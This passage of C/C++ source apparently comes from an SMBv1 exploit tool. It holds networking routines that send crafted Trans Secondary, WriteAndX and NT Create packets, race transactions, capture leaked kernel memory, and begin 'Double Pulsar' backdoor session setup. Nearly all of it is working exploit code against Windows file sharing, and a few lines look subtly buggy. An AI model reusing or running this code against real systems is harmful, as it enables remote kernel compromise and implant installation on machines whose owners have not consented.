808 | PutUnsigned(rstatus, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
809 |
810 | if (!GetUlong(rstatus) || issockerr(GetUlong(rstatus)))
811 | return FALSE;
812 |
813 | if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
814 | return FALSE;
815 |
816 | bwsalloc(&tmp, GetUlong(rstatus));
817 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
818 | bwsfree(client);
819 |
820 | bwsalloc(client, tmp.dwsize);
821 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
822 | bwsfree(&tmp);
823 |
824 | bwsalloc(leakbws, client->dwsize);
825 | cpy(leakbws->pbdata, client->pbdata, leakbws->dwsize);
826 |
827 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
828 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
829 | leak->ResponseHeader = MAKEPSMB(leak->KrnlLeakResponse.pbdata + SMB_HEADER_OFFSET);
830 |
831 | inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
832 | outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
833 | leak->ResponseNetbios = MAKEPDWORD(leak->KrnlLeakResponse.pbdata);
834 |
835 | transresp = (PRESP_TRANSACTION)(leakbws->pbdata + SMB_PARAM_OFFSET);
836 |
837 | leak->ResponseParameters = (MAKEPBYTE(leak->ResponseHeader) + transresp->ParameterOffset);
838 | leak->ResponseData = (MAKEPBYTE(leak->ResponseHeader) + transresp->DataOffset);
839 |
840 | return((cmp(leak->KrnlLeakResponse.pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4) == TRUE) ? TRUE : FALSE);
841 | }
842 |
843 | BOOLEAN SendRecvWriteAndxIndataShift(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
844 | {
845 | unsigned int sendsize[2] = { 0 }, recvsize[2] = { 0 };
846 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
847 |
848 | if (isnull(outbound) || isnull(inbound) || isnull(info))
849 | return FALSE;
850 |
851 | if (badsock(s))
852 | return FALSE;
853 |
854 | if (get_fid(info) != 0x4000)
855 | set_fid(info, 0x4000);
856 |
857 | if (isnull(write_andx_shift_indata_packet(srv, 10251, get_uid(info), get_special_mid(info), get_tid(info), get_fid(info))))
858 | return FALSE;
859 |
860 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
861 |
862 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
863 | return FALSE;
864 |
865 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
866 |
867 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
868 | return FALSE;
869 |
870 | bwsalloc(&tmp, GetUlong(recvsize));
871 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
872 | bwsfree(client);
873 |
874 | bwsalloc(client, tmp.dwsize);
875 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
876 | bwsfree(&tmp);
877 |
878 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
879 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
880 |
881 | inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
882 | outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
883 |
884 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
885 | {
886 | SetLastError(NT_STATUS_INVALID_SMB);
887 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
888 | return FALSE;
889 | }
890 |
891 | if (GetUlong(&inbound->ThisSmb->Status.NtStatus) & 0xFFFFFFFFUL)
892 | {
893 | SetLastError(GetUlong(&inbound->ThisSmb->Status.NtStatus));
894 | PutUlong(&info->srv_last_error, GetUlong(&inbound->ThisSmb->Status.NtStatus));
895 | return FALSE;
896 | }
897 |
898 | return TRUE;
899 | }
900 |
901 | BOOLEAN SendRecvTransSecondaryMultiplexOverwrite(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
902 | {
903 | unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
904 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
905 |
906 | if (isnull(outbound) || isnull(inbound) || isnull(info))
907 | return FALSE;
908 |
909 | if (badsock(s))
910 | return FALSE;
911 |
912 | if (isnull(trans_secondary_mid_overwrite_packet(srv, 10251, get_uid(info), get_special_mid(info), get_tid(info))))
913 | return FALSE;
914 |
915 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
916 |
917 | if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
918 | return FALSE;
919 |
920 | PutUnsigned(recvstatus, RecvData(client, 0x100, s, GetUnsigned(recvstatus + 1)));
921 |
922 | if (!GetUlong(recvstatus) || issockerr(GetUlong(recvstatus)))
923 | return FALSE;
924 |
925 | bwsalloc(&tmp, GetUlong(recvstatus));
926 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
927 | bwsfree(client);
928 |
929 | bwsalloc(client, tmp.dwsize);
930 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
931 | bwsfree(&tmp);
932 |
933 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
934 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
935 |
936 | inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
937 | outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
938 |
939 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
940 | return FALSE;
941 |
942 | if (inbound->ThisSmb->Status.NtStatus & 0xFFFFFFFF)
943 | {
944 | PutUlong(&info->srv_last_error, GetUlong(&inbound->ThisSmb->Status.NtStatus));
945 | SetLastError(info->srv_last_error);
946 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
947 | return FALSE;
948 | }
949 |
950 | return TRUE;
951 | }
952 |
953 | BOOLEAN SendRecvTransSecondaryFirstMuliplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
954 | {
955 | unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
956 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
957 |
958 | if (isnull(outbound) || isnull(inbound) || isnull(info))
959 | return FALSE;
960 |
961 | if (badsock(s))
962 | return FALSE;
963 |
964 | if (isnull(trans_secondary_first_mid_zero_packet(srv, 10252, get_uid(info), 0, get_tid(info))))
965 | return FALSE;
966 |
967 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
968 |
969 | if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
970 | return FALSE;
971 |
972 | PutUnsigned(recvstatus, RecvData(client, 0x100, s, GetUnsigned(recvstatus)));
973 |
974 | if (!GetUlong(recvstatus) || issockerr(GetUlong(recvstatus)))
975 | return FALSE;
976 |
977 | bwsalloc(&tmp, GetUlong(recvstatus));
978 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
979 | bwsfree(client);
980 |
981 | bwsalloc(client, tmp.dwsize);
982 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
983 | bwsfree(&tmp);
984 |
985 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
986 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
987 |
988 | inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
989 | outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
990 |
991 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
992 | {
993 | SetLastError(NT_STATUS_INVALID_SMB);
994 | return FALSE;
995 | }
996 | return TRUE;
997 | }
998 |
999 | BOOLEAN SendRecvTransSecondaryFirstSpecialMultiplex(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1000 | {
1001 | unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
1002 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1003 |
1004 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1005 | return FALSE;
1006 |
1007 | if (badsock(s))
1008 | return FALSE;
1009 |
1010 | if (isnull(trans_secondary_first_special_mid_packet(srv,
1011 | 10251,
1012 | get_uid(info),
1013 | get_special_mid(info),
1014 | get_tid(info))))
1015 | {
1016 | return FALSE;
1017 | }
1018 |
1019 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
1020 |
1021 | if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
1022 | return FALSE;
1023 |
1024 | inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
1025 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1026 |
1027 | return TRUE;
1028 | }
1029 |
1030 | BOOLEAN SendRecvTransSecondaryRaceTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
1031 | {
1032 | unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
1033 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, * leakbws = &leak->KrnlLeakResponse, tmp = { 0 };
1034 | PRESP_TRANSACTION responsetransaction = NULL;
1035 | PRESP_TRANSACTION_INTERIM responseinterim = NULL;
1036 |
1037 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1038 | return FALSE;
1039 |
1040 | if (badsock(s))
1041 | return FALSE;
1042 |
1043 | if (isnull(trans_secondary_race_type_one_packet(srv, get_special_pid(info), get_uid(info), 0, get_tid(info))))
1044 | return FALSE;
1045 |
1046 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
1047 |
1048 | if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
1049 | return FALSE;
1050 |
1051 | PutUnsigned(recvstatus, RecvData(client, 0x100, s, GetUnsigned(recvstatus + 1)));
1052 |
1053 | if (!GetUlong(recvstatus) || issockerr(GetUlong(recvstatus)))
1054 | return FALSE;
1055 |
1056 | bwsalloc(&tmp, GetUlong(recvstatus));
1057 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1058 | bwsfree(client);
1059 |
1060 | bwsalloc(leakbws, tmp.dwsize);
1061 | cpy(leakbws->pbdata, tmp.pbdata, leakbws->dwsize);
1062 |
1063 | bwsalloc(client, tmp.dwsize);
1064 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1065 | bwsfree(&tmp);
1066 |
1067 | inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
1068 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1069 |
1070 | outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
1071 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1072 |
1073 | responsetransaction = ((PRESP_TRANSACTION)(leak->KrnlLeakResponse.pbdata + SMB_PARAM_OFFSET));
1074 |
1075 | leak->ResponseHeader = MAKEPSMB(leak->KrnlLeakResponse.pbdata + SMB_HEADER_OFFSET);
1076 | leak->ResponseData = (MAKEPBYTE(leak->ResponseHeader) + responsetransaction->DataOffset);
1077 | leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + responsetransaction->ParameterOffset;
1078 | leak->ResponseNetbios = MAKEPDWORD(leak->KrnlLeakResponse.pbdata);
1079 |
1080 |
1081 | if ((!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4)) || (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4)))
1082 | {
1083 | SetLastError(NT_STATUS_INVALID_SMB);
1084 | return FALSE;
1085 | }
1086 |
1087 | return TRUE;
1088 | }
1089 |
1090 | BOOLEAN SendRecvTransSecondarySecondMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1091 | {
1092 | unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
1093 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1094 |
1095 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1096 | return FALSE;
1097 |
1098 | if (badsock(s))
1099 | return FALSE;
1100 |
1101 | if (isnull(trans_secondary_second_mid_zero_packet(srv, 10252, get_uid(info), 0, get_tid(info))))
1102 | return FALSE;
1103 |
1104 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
1105 |
1106 | if (GetUlong(sendstatus) == 0 || issockerr(GetUlong(sendstatus)))
1107 | return FALSE;
1108 |
1109 | //PutUnsigned(recvstatus, RecvData(client, 0))
1110 |
1111 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1112 | outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
1113 |
1114 |
1115 | return TRUE;
1116 | }
1117 |
1118 | BOOLEAN SendRecvTransSecondaryRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
1119 | {
1120 | static unsigned int sendsize[2], recvsize[2];
1121 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, * leakbws = &leak->KrnlLeakResponse, tmp = { 0 };
1122 | packet_creation_handler_type_one create_packet = &trans_secondary_race_type_two_packet;
1123 | PRESP_TRANSACTION trans = NULL;
1124 |
1125 |
1126 | if (isnull(outbound) || isnull(inbound) || isnull(info) || isnull(leak))
1127 | return FALSE;
1128 |
1129 | if (badsock(s) || isnull(create_packet))
1130 | return FALSE;
1131 |
1132 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
1133 | return FALSE;
1134 |
1135 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1136 |
1137 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1138 | return FALSE;
1139 |
1140 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1141 |
1142 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1143 | return FALSE;
1144 |
1145 | bwsalloc(&tmp, GetUlong(recvsize));
1146 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1147 | bwsfree(client);
1148 |
1149 | bwsalloc(client, tmp.dwsize);
1150 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1151 | bwsfree(&tmp);
1152 |
1153 | bwsalloc(leakbws, client->dwsize);
1154 | cpy(leakbws->pbdata, client->pbdata, leakbws->dwsize);
1155 |
1156 | trans = (PRESP_TRANSACTION)(leakbws->pbdata + SMB_PARAM_OFFSET);
1157 |
1158 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1159 | inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
1160 |
1161 | leak->ResponseHeader = MAKEPSMB(leakbws->pbdata + SMB_HEADER_OFFSET);
1162 | leak->ResponseNetbios = MAKEPDWORD(leakbws->pbdata);
1163 | leak->ResponseData = MAKEPBYTE(leak->ResponseHeader) + trans->DataOffset;
1164 | leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + trans->ParameterOffset;
1165 |
1166 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1167 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1168 |
1169 |
1170 | if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1171 | return FALSE;
1172 |
1173 | return TRUE;
1174 | }
1175 |
1176 | BOOLEAN SendRecvTransSecondaryThirdMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1177 | {
1178 | static unsigned int sendsize[2], recvsize[2];
1179 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1180 | packet_creation_handler_type_one create_packet = &trans_secondary_third_mid_zero_packet;
1181 |
1182 |
1183 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1184 | return FALSE;
1185 |
1186 | if (badsock(s))
1187 | return FALSE;
1188 |
1189 | if (isnull(create_packet))
1190 | return FALSE;
1191 |
1192 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), 0, get_tid(info))))
1193 | return FALSE;
1194 |
1195 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1196 |
1197 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1198 | return FALSE;
1199 |
1200 | inbound->ThisNetbiosSize = NULL;
1201 | inbound->ThisSmb = MAKEPSMB(NULL);
1202 |
1203 | outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
1204 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1205 |
1206 | if (!cmp(outbound->ThisSmb->Protocol, "\xFFSMB", 4))
1207 | return FALSE;
1208 |
1209 | return TRUE;
1210 | }
1211 |
1212 | BOOLEAN SendRecvTransSecondarySecondRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
1213 | {
1214 | static unsigned int sendsize[2], recvsize[2];
1215 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, * leakbws = &leak->KrnlLeakResponse, tmp = { 0 };
1216 | packet_creation_handler_type_one create_packet = &trans_secondary_second_race_type_two_packet;
1217 | PRESP_TRANSACTION trans = NULL;
1218 |
1219 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1220 | return FALSE;
1221 |
1222 | if (badsock(s))
1223 | return FALSE;
1224 |
1225 | if (isnull(create_packet))
1226 | return FALSE;
1227 |
1228 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
1229 | return FALSE;
1230 |
1231 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1232 |
1233 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1234 | return FALSE;
1235 |
1236 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1237 |
1238 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1239 | return FALSE;
1240 |
1241 | bwsalloc(&tmp, GetUlong(recvsize));
1242 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1243 | bwsfree(client);
1244 |
1245 | bwsalloc(client, tmp.dwsize);
1246 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1247 | bwsfree(&tmp);
1248 |
1249 | bwsalloc(leakbws, client->dwsize);
1250 | cpy(leakbws->pbdata, client->pbdata, leakbws->dwsize);
1251 |
1252 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1253 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1254 |
1255 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
1256 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1257 |
1258 | trans = (PRESP_TRANSACTION)(leak->KrnlLeakResponse.pbdata + SMB_PARAM_OFFSET);
1259 |
1260 | leak->ResponseData = MAKEPBYTE(leak->ResponseHeader) + trans->ParameterOffset;
1261 | leak->ResponseHeader = MAKEPSMB(leakbws->pbdata + SMB_HEADER_OFFSET);
1262 | leak->ResponseNetbios = MAKEPDWORD(leakbws->pbdata);
1263 | leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + trans->ParameterOffset;
1264 |
1265 | if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1266 | return FALSE;
1267 |
1268 | return TRUE;
1269 | }
1270 |
1271 | BOOLEAN SendRecvTransSecondaryFourthMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1272 | {
1273 | static unsigned int sendsize[2], recvsize[2];
1274 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1275 | packet_creation_handler_type_one create_packet = &trans_secondary_fourth_mid_zero_packet;
1276 |
1277 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1278 | return FALSE;
1279 |
1280 | if (badsock(s))
1281 | return FALSE;
1282 |
1283 | if (isnull(create_packet))
1284 | return FALSE;
1285 |
1286 | if (isnull(create_packet(srv, 10252, get_uid(info), 0, get_tid(info))))
1287 | return FALSE;
1288 |
1289 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1290 |
1291 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1292 | return FALSE;
1293 |
1294 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
1295 | outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
1296 |
1297 | inbound->ThisNetbiosSize = NULL, inbound->ThisSmb = NULL;
1298 |
1299 | return TRUE;
1300 | }
1301 |
1302 | BOOLEAN SendRecvTransSecondaryThirdRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
1303 | {
1304 | static unsigned int sendsize[2], recvsize[2];
1305 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, * leakbws = &leak->KrnlLeakResponse, tmp = { 0 };
1306 | packet_creation_handler_type_one create_packet = &trans_secondary_second_race_type_two_packet;
1307 | PRESP_TRANSACTION trans = NULL;
1308 |
1309 | if (isnull(inbound) || isnull(outbound) || isnull(info) || isnull(leak))
1310 | return FALSE;
1311 |
1312 | if (badsock(s))
1313 | return FALSE;
1314 |
1315 | if (isnull(create_packet))
1316 | return FALSE;
1317 |
1318 | if (isnull(create_packet(srv, 0, get_uid(info), 0, get_tid(info))))
1319 | return FALSE;
1320 |
1321 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1322 |
1323 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1324 | return FALSE;
1325 |
1326 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1327 |
1328 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1329 | return FALSE;
1330 |
1331 | bwsalloc(&tmp, GetUlong(recvsize));
1332 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1333 | bwsfree(client);
1334 |
1335 | bwsalloc(client, tmp.dwsize);
1336 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1337 | bwsfree(&tmp);
1338 |
1339 | if (isnull(leak->KrnlLeakResponse.pbdata))
1340 | {
1341 | bwsalloc(leakbws, client->dwsize);
1342 | cpy(leakbws->pbdata, client->pbdata, leakbws->dwsize);
1343 | }
1344 |
1345 | inbound->ThisNetbiosSize = (client->pbdata + NETBIOS_SIZE_OFFSET);
1346 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1347 |
1348 | outbound->ThisNetbiosSize = (srv->pbdata + NETBIOS_SIZE_OFFSET);
1349 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1350 |
1351 | trans = (PRESP_TRANSACTION)(leakbws->pbdata + SMB_PARAM_OFFSET);
1352 |
1353 | leak->ResponseHeader = MAKEPSMB(leakbws->pbdata + SMB_HEADER_OFFSET);
1354 | leak->ResponseNetbios = MAKEPDWORD(leakbws->pbdata);
1355 | leak->ResponseParameters = (MAKEPBYTE(leak->ResponseHeader) + trans->ParameterOffset);
1356 | leak->ResponseData = (MAKEPBYTE(leak->ResponseHeader) + trans->DataOffset);
1357 |
1358 | if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1359 | return FALSE;
1360 |
1361 | return TRUE;
1362 | }
1363 |
1364 | BOOLEAN SendRecvSecondNtCreateAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1365 | {
1366 | static unsigned int sendsize[2], recvsize[2];
1367 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1368 | packet_creation_handler_type_one create_packet = &nt_create_andx_second_packet;
1369 | PRESP_NT_CREATE_ANDX ntcreate = NULL;
1370 |
1371 | if (isnull(inbound) || isnull(outbound) || isnull(info))
1372 | return FALSE;
1373 |
1374 | if (badsock(s))
1375 | return FALSE;
1376 |
1377 | if (isnull(create_packet))
1378 | return FALSE;
1379 |
1380 | if (isnull(create_packet(srv, 0, get_uid(info), 0, get_tid(info))))
1381 | return FALSE;
1382 |
1383 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1384 |
1385 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1386 | return FALSE;
1387 |
1388 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1389 |
1390 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1391 | return FALSE;
1392 |
1393 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
1394 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1395 |
1396 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1397 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1398 |
1399 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1400 | return FALSE;
1401 | return TRUE;
1402 | }
1403 |
1404 |
1405 |
1406 |
1407 | /*
1408 | *
1409 | *
1410 | *
1411 | * Double Pulsar networking functions
1412 | *
1413 | *
1414 | *
1415 | */
1416 |
1417 | BOOLEAN SendRecvTrans2SessionSetup(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1418 | {
1419 | static unsigned int sendsize[2], recvsize[2];
1420 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1421 | packet_creation_handler_type_one create_packet = &trans2_session_setup_packet;
1422 |
1423 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1424 | return FALSE;
1425 |
1426 | if (badsock(s))
1427 | return FALSE;
1428 |
1429 | if (isnull(create_packet))
1430 | return FALSE;
1431 |
1432 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
1433 | return FALSE;
1434 |
1435 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1436 |
1437 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1438 | return FALSE;
1439 |
1440 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1441 |
1442 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1443 | return FALSE;
1444 |
1445 | bwsalloc(&tmp, GetUlong(recvsize));
1446 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1447 | bwsfree(client);
1448 |
1449 | bwsalloc(client, tmp.dwsize);
1450 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1451 | bwsfree(&tmp);
1452 |
1453 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
1454 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1455 |
1456 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1457 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1458 |
1459 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1460 | return FALSE;
1461 |
1462 | return TRUE;
1463 | }
1464 |
